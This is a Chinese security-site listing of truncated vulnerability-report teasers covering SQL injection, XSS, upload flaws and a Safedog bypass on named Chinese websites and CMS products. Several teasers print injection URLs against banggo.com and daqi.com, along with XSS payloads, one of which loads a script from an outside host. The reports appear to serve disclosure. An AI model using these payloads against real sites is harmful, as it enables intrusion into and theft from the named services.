美特斯邦威官方商城某盲注和某union注入 - 网站安关注热度:15

美特斯邦威官方商城某盲注，赞一下厂商，漏洞响应很快，修复得很快，也加了防注。。找了很久才发现这小问题。。再修一下吧。。。http://me-city.banggo.com/Goods/comments?good_id=556375user_i..[详情]

友情检测中国书画联盟以及站长网站 - 网站安全关注热度:5

学校旁边有一家书法，跟画室，因为他家吃饭（开饭店的）对其佩服~百度搜索到了他的工作室，发现居然还有个人网站，无语了。一看下去更加惊讶，竟然还创办了中国书画联盟。。。..[详情]

PHPMyWind v4.5.2 0day - 网站安全 - 自学php关注热度:10

代码：define(#39;PHPMYWIND_INC#39;, preg_replace(/[\/\\\\]{1,}/, #39;/#39;, dirname(__FILE__)));define(#39;PHPMYWIND_ROOT#39;, preg_replace(/[\/\\\\]{1,}/, #39;/#39;, substr(PHPM.....[详情]

反向代理在Web渗透测试中的运用 - 网站安全 - 自关注热度:13

在一次Web渗透测试中，目标是M国的一个Win+Apache+PHP+MYSQL的网站，独立服务器，对外仅开80端口，网站前端的业务系统比较简单，经过几天的测试也没有找到漏洞，甚至连XSS都没有发现，..[详情]

SHELL突破安全狗远程登录连接限制 - 网站安全 -关注热度:12

默认安装路径C:\Program Files\SafedogServerC:\Program Files\SafedogServer\SafeDogGuardCenter下载ProGuardData.ini 文件到本地，然后本地安装安全狗，覆盖本地的安装目录，覆盖失败。更改www.2cto.com C.....[详情]

zen cart安全漏洞–防黑必看 - 网站安全 - 自学ph关注热度:28

www.2cto.com：前面发过：http://www.2cto.com/Article/201206/134369.html红黑联盟旗下护航网(www.hhsafe.com)最接受的一个网站渗透测试和修复工作就是使用的zen cart，问题非常多。最近某网站被入侵，通..[详情]

大旗网论坛和精品体验子站SQL注入 - 网站安全关注热度:11

有两处SQL注入分别是：http://bbs.daqi.com/cgi-bin/bbs/author.cgi?author=test#39;http://try.daqi.com/cgi-bin/experience/exp_active_email?key=testuid=test#39;xmysql::query() error: You have an.....[详情]

骑士cms任意目录打包下载漏洞(74cms v3.1.20120214)关注热度:12

74cms_v3.1.20120214中任意web目录打包下载。。。很有意思的漏洞74cms后台有一个备份模板的功能，程序会自动备份选中的模板并压缩下载，但是没有对用户提交的$tpl变量进行检查就带入函数..[详情]

美特斯邦威官方商城及大赛子站两处盲注 - 网站关注热度:13

美特斯邦威官方商城某两处盲注详细说明：盲注一：http://www.banggo.com/Search.shtml?cid=1dis=[0-9.5]ad=155%20order%20by%2017%23http://www.banggo.com/Search.shtml?cid=1dis=[0-9.5]ad=155%20and%201=.....[详情]

shopEX商城后台对上传模板包过滤不严致可上传木关注热度:7

shopx系列产品，可能是编程习惯问题，对上传的模板包，过滤不严，导致上传攻击文件，如果权限设置比较严，可能会失效，但是危害还是非常大的。形成这个漏洞的原因，可能是程序员..[详情]

优酷&土豆的XSS - 网站安全 - 自学php关注热度:5

优酷和土豆结合了，两者的漏洞也是如此的相似。夫唱妇随。详细说明：因为一些基本的安全常识不到位，导致了存储型xss。漏洞证明：测试代码：/textareascript src=http://tmxk.org/m/q.js/scr..[详情]

web安全之信息刺探防范（上） - 网站安全 - 自学关注热度:9

#----------------------------------------------------------## ====红色字体 -特指煮酒个人所见。加粗则为需要重点注意。## ====蓝色加粗 -特指与本文相关人员，包括参与修正的朋友。## ==== 煮酒品.....[详情]

我的搜狐9处持久型及反射型xss及搜狐邮箱3处反射关注热度:33

主要是http://i.sohu.com/持久型及反射型xss9处详细说明：持久型：http://i.sohu.com/app/friend/#/a/search/user/search/find.do?_input_encode=UTF-8nick=xsser反射型：http://i.sohu.com/a/register/passpor.....[详情]

新浪邮箱word文档处持久型xss - 网站安全 - 自学关注热度:11

通过修改word文档的属性！邮件在获取word文档属性时，虽然注释了，但没有过滤，可绕过！还有通过在word文档添加超链接也是一样！修改属性为:/o:Author/xml--/stylescriptalert(/goderci/)/script当..[详情]

Wordpree插件评论啦代码审计不严 - 网站安全 - 自关注热度:12

shell2us成员血狼访问某站，wordpress系统，那B浏览器禁用了javascript，发现评论处出现网站路径泄露，从wordpress官网插件下载频道下载此插件，发现问题还有很多！请往下看详细说明：访问..[详情]